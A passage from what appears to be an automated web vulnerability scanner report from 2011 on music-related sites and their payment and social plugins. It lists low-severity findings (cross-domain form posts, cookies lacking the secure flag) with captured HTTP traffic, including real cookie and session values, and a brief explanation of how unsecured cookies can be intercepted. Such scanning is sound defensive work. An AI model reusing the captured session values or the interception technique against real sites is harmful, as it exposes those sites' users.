<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc7f3459db615008632004" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">3</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cells
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.244.124
X-Cnection: close
Date: Mon, 09 May 2011 13:59:45 GMT
Content-Length: 6926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"4695d6a8",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"66.220.146.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc7f35112aa50667364627" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">3</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cells
...[SNIP]...

12.10. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.125
X-Cnection: close
Date: Mon, 09 May 2011 14:04:49 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u988983_1" class="fbConnectWidgetTopmost" style="height:256px; width:354px; "><div class="mhs pvm phs ConnectActivityLogin hidden_elem uiBoxWhite"><label class="mrm fbLoginButton uiButton uiButtonConfirm uiButtonLarge" for="u988983_2"><input value="Log in" onclick="ConnectSocialWidget.getInstance(&quot;u988983_1&quot;).login();" type="submit" id="u988983_2" /></label><div class="ConnectActivityLoginMessage"></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/nmemagazine" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/188057_9577714166_7953271_q.jpg" alt="NME Magazine" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/nmemagazine" target="_blank"><span class="name">NME Magazine</span> on Facebook</a></div><div><div id="connect_widget_4dc7f481cc6a02046653508" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>NME Magazine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_admin_option">Admin Page</a
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.114.125
X-Cnection: close
Date: Mon, 09 May 2011 14:05:37 GMT
Content-Length: 18150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u993736_1" class="fbConnectWidgetTopmost" style="height:256px; width:354px; "><div class="mhs pvm phs ConnectActivityLogin hidden_elem uiBoxWhite"><label class="mrm fbLoginButton uiButton uiButtonConfirm uiButtonLarge" for="u993736_2"><input value="Log in" onclick="ConnectSocialWidget.getInstance(&quot;u993736_1&quot;).login();" type="submit" id="u993736_2" /></label><div class="ConnectActivityLoginMessage"></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/nmemagazine" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/188057_9577714166_7953271_q.jpg" alt="NME Magazine" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/nmemagazine" target="_blank"><span class="name">NME Magazine</span> on Facebook</a></div><div><div id="connect_widget_4dc7f4b157f875447287826" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>NME Magazine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_admin_option">Admin Page</a
...[SNIP]...

13. Cross-domain POST
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


13.1. http://asthmatickitty.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain asthmatickitty.us1.list-manage.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...
<div id="mc_embed_signup" style="width: 230px;">
<form action="http://asthmatickitty.us1.list-manage.com/subscribe/post?u=8b99b26102810d538744c3fa2&amp;id=30df477f26" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" style="font: normal 100% Verdana;font-size: 10px;">
   <fieldset style="-moz-border-radius: 4px;border-radius: 4px;-webkit-border-radius: 4px;border: 0px;padding:0px;margin: 0;background-color: #FFFFFF;color: #333333;text-align: left;">
...[SNIP]...

13.2. http://asthmatickitty.com/news.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Issue detail

The page contains a form which POSTs data to the domain asthmatickitty.us1.list-manage.com. The form contains the following fields:

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...
<div id="mc_embed_signup" style="width: 230px;">
<form action="http://asthmatickitty.us1.list-manage.com/subscribe/post?u=8b99b26102810d538744c3fa2&amp;id=30df477f26" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" style="font: normal 100% Verdana;font-size: 10px;">
   <fieldset style="-moz-border-radius: 4px;border-radius: 4px;-webkit-border-radius: 4px;border: 0px;padding:0px;margin: 0;background-color: #FFFFFF;color: #333333;text-align: left;">
...[SNIP]...

13.3. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

Request

GET /themes/default/static_images//themes/default/images/footer_bkgrd.gif HTTP/1.1
Host: static.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Wed, 13 Apr 2011 14:52:18 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 3553292c29d61be30dade092df8597046390d4ea"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3640"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014481544494629"]|
X-Wf-1-1-1-10: 23|[{"Type":"LOG"},"ct: "]|
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=345007, post-check=0, pre-check=0
Expires: Fri, 13 May 2011 13:52:24 GMT
Date: Mon, 09 May 2011 14:02:17 GMT
Connection: close
Content-Length: 41093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
</p>
            <form name="form2" method="post" action="http://ebm.cheetahmail.com/r/regf2" onsubmit="return popupform(this, 'join')">
               <p>
...[SNIP]...

13.4. http://www.nme.com/news/sufjan-stevens/56527

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...
</p>
   <form onsubmit="return popupform(this, 'join')" action="http://ebm.cheetahmail.com/r/regf2" method="post" name="form2" class="box_fixed_height">
       <input type="hidden" value="1577005779" name="aid" />
...[SNIP]...

14. SSL cookie without secure flag set
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


14.1. https://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

14.2. https://www.ccnow.com/cgi-local/checkout.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

14.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

15. Cross-domain Referer leakage
There are 42 instances of this issue:

